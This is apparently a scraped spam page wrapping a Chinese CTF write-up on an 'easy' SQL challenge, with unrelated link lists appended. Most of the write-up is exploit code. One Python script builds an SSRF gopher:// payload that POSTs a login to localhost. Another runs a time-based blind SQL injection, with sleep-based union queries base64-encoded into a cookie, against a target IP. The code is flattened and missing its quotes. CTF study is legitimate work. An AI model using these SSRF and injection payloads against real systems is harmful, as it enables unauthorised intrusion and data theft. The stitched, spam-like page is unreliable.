当前位置: 首页 > news >正文

flash html网站模板做公司的网站有哪些东西

news 2025/11/25 2:09:49
flash html网站模板,做公司的网站有哪些东西,关闭wordpress,汨罗做网站不太会#xff0c;以后慢慢看 被骗了#xff0c;看见very_easy就点进来了#xff0c;结果所有sql能试的全试了一点用都没有 打开源代码发现有个use.php 好家伙#xff0c;这是真的在考sql吗...... 制作gopher协议的脚本#xff1a; import urllib.parsehost 12…不太会以后慢慢看 被骗了看见very_easy就点进来了结果所有sql能试的全试了一点用都没有  打开源代码发现有个use.php 好家伙这是真的在考sql吗......  制作gopher协议的脚本 import urllib.parsehost 127.0.0.1:80 content unameadminpasswdadmin content_length len(content)test \ POST /index.php HTTP/1.1 Host: {} User-Agent: curl/7.43.0 Accept: */* Content-Type: application/x-www-form-urlencoded Content-Length: {}{} .format(host,content_length,content)tmp urllib.parse.quote(test) new tmp.replace(%0A,%0D%0A) result urllib.parse.quote(new) print(gopher://host/_result)得出来payload在网址处提交 gopher://127.0.0.1:80/_POST%2520/index.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AUser-Agent%253A%2520curl/7.43.0%250D%250AAccept%253A%2520%252A/%252A%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252024%250D%250A%250D%250Auname%253Dadmin%2526passwd%253Dadmin%250D%250A Set_Cookie处有YWRtaW4%3D解码半天弄不出来突然意识到%3D是的意思哎呦我这个笨蛋  没有报错没有回显这道题用时间盲注注入点在cookie中 时间盲注脚本 import urllib.parse import requests import time import base64url http://61.147.171.105:51906/use.php?url flag for pos in range(1, 50):for i in range(32, 127):# 猜一下回显数量#payload) union select 1,2,if(11,sleep(2),1)## 猜数据库名字为securitypayload ) union select 1,2,if(ascii(substr((database()),str(pos),1))str(i),sleep(2),1)## 猜解数据库表名为flag# poc ) union select 1,2,if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schemasecurity),str(pos),1))str(i),sleep(2),1)## 猜解flag字段#payload ) union select 1,2,if(ascii(substr((select * from flag),str(pos),1))str(i),sleep(2),1) #payload base64.b64encode(payload.encode(utf-8)).decode(utf-8)final_poc gopher://127.0.0.1:80/_GET%20%2findex.php%20HTTP%2f1.1%250d%250aHost%3A%20localhost%3A80%250d%250aConnection%3A%20close%250d%250aContent-Type%3A%20application%2fx-www-form-urlencoded%250d%250aCookie%3A%20this%5Fis%5Fyour%5Fcookie%3Dpayload%3B%250d%250astart time.time()requests.get(urlfinal_poc)end time.time()if end-start 2: # 如果时间大于2秒说明这个字符是正确的flag chr(i)print(flag)breakelse:continue
http://www.dnsts.com.cn/news/144425.html

相关文章:

  • 网站开发文档编写网站建设投资预算
  • php电子商务网站模板自己做网站做淘宝客
  • 网站建设的基本北京网站设计公司排名
  • 中国佛山手机网站建设易记域名网站大全
  • 网站开发人员需求智能网站建设软件有哪些
  • 网站的建设初步定位wordpress 教程 书籍
  • iis7.5发布网站教程网站服务器如何更改解析
  • 作文生成器网站网站兼容工具
  • 深圳企业网站制作报价中山网站建设文化报价
  • 学校网站建设与管理办法wordpress寺院模板
  • 网站建设费会计处理网站建设 金手指排名霸屏
  • 重庆网站建设招标编写软件开发文档
  • 网站建设仟首先金手指14虚拟机 网站建设
  • 网站建设裕鸿国际WordPress如何设置付费下载
  • 东莞做网站公司哪家好企业网站设计的特点
  • 都匀网站制作奈曼旗建设局网站
  • 网站地图的作用网页制作与网站建设宝典pdf
  • 镇江佳鑫网络科技有限公司seo的宗旨是
  • 最简单的网站模板下载湖南城乡住房建设厅网站
  • 网站建设合同 域名续期能打开任何网站浏览器下载
  • 网站建设广告词17做网店广州货源网
  • 网站开发开票内容专业做网带
  • 蛋白质结构预测工具网站开发做海报可以在哪些网站下载素材
  • 城乡和建设部建造师网站金华网站制作推广
  • 成品网站 代理wordpress 验证表单
  • 目前网站开发语言飞猪旅游的网站建设
  • 嘉兴模板建站软件商城网站做推广方案
  • 上海做ui网站最好的公司90字体设计
  • 酷站网官网莱芜庞允盟
  • 中国空间站研究项目软件设计师考什么